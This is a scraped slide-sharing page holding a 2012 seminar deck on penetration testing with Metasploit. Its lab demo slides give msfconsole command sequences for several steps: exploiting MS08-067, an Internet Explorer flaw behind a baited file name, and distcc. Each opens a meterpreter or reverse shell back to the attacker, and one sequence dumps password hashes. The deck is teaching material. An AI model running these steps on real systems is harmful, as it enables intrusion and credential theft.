Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul
 
What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...
Vishnu Singh Chundawat
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
Mobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi ArabiaMobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi Arabia
Steve Jonas
 
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc
 
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
organizerofv
 
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven InsightsAndrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell
 
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Impelsys Inc.
 
TrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business ConsultingTrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business Consulting
Trs Labs
 
Procurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptxProcurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptx
Jon Hansen
 

Pentest with Metasploit

  • 1. penetrationtesting withmetasploit Presented by Syarif ! Seminar IT Security Safe The System Sumedang, April 29 2012 STMIK Sumedang
  • 2. Agenda • Why & What’s Penetration Testing ( Pentest ) • << back|track Overview • Metasploit Basics & Meterpreter • DEMO :)
  • 3. Whoami • geek & Pentester • infosec trouble maker • InfoSec enthusiast • CyberCrime investigator • Lecture & Engineer
  • 4. Why Pentest ? • Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1) • Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
  • 5. What’s Penetration Testing • A method to evaluate the security of computer system / network • Practice ( attacking ) an IT System like a ‘hacker’ does • Find security holes ( weaknesses ) • Bypass security mechanism • Compromise an organization’s IT system security Must have permission from IT system owner ! illegal activity put you in Jail
  • 6. Ethics • Think before act • Don’t be stupid • Don’t be malicious
  • 7. Pentest Phases Vulnerability Analysis Information Gathering Exploitation Post Exploitation Reporting
  • 8. << back|track overview • Let’s Watch theVideo :)
  • 9. << back|track overview • . The Most Advanced Linux Security Distribution Open Source & Always be Developed for Security Professional Real World Pentesting Tools
  • 12. What’s • Not just a tool, but an entire framework *1) • an Open source platform for writing security tools and exploits *2) • Easily build attack vectors to add its exploits, payloads, encoders, • Create and execute more advanced attack • Ruby based
  • 13. Metasploit interfaces • MSFconsole • MSFcli • msfweb, msfgui ( discontinued ) • Metasploit Pro, Metasploit Express • Armitage
  • 16. Metasploit Terminology • Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1) • Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) • Shellcode : a set of instructions used as payload when exploitation occurs *1) • Module : a software that can be used by metasploit *1) • Listener : a component for waiting an incoming connection *1)
  • 17. How does exploitation works attacker exploit + payload vulnerable server 1 exploit run , then payload run 2 3 Upload / Download data
  • 18. Traditional PentestVs Metasploit Public Exploit Gathering Change offsets Replace ShellCode Load Metasploit Choose the target OS Use exploit SET Payload Execute Traditional Pentest Metasploit for Pentest
  • 19. Meterpreter • as a payload after vulnerability is exploited *1) • Improve the post exploitation
  • 20. Meterpreter Exploiting a vulnerability Select a meterpreter as a payload meterpreter shell
  • 26. Pentest Scenario attacker vulnerable OS onVMware * : Ubuntu 8.04 metasploitable *
  • 27. OS in the Lab • BackTrack 5 R 2 • IP address : 172.16.240.143 • Windows Xp SP 2 • IP address : 172.16.240.129 • Windows 2003 Server • IP address : 172.16.240.141 • Windows 7 • IP address : 172.16.240.142 • Ubuntu Linux 8.04 ( Metasploitable ) • IP address : 172.16.240.144
  • 28. Windows XP Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
  • 29. Windows XP Post Exploitation • session -i 1 • meterpreter > getsystem -h • getuid • hashdump
  • 30. Windows 2003 Server Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
  • 31. Windows 7 Exploitation • msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms11_003_ie_css_import) > show options • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set LPORT 443 • msf exploit(ms11_003_ie_css_import) > exploit Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi
  • 32. Windows 7 Exploitation • msf exploit(ms11_003_ie_css_import) > sessions -l • msf exploit(ms11_003_ie_css_import) > sessions -i 1 • meterpreter > sysinfo • meterpreter > shell
  • 33. Ubuntu 8.04 Metasploitable Exploitation • search distcc • use exploit/unix/misc/distcc_exec • show payloads • set PAYLOAD cmd/unix/reverse • show options • set rhost 172.16.240.144 • set lhost 172.16.240.143 • exploit
  • 34. Any Question ? Contact me • website : http://fl3x.us • twitter : @fl3xu5
  • 35. Greet & Thanks To • BackTrack Linux • Metasploit Team ( HD Moore & rapid7 ) • Offensive Security / Metasploit Unleashed • David Kennedy • Georgia Weidman
  • 36. References ! ! • 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni • 2. http://www.metasploit.com • 3. http://www.offensive-security.com/metasploit- unleashed/Main_Page • 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines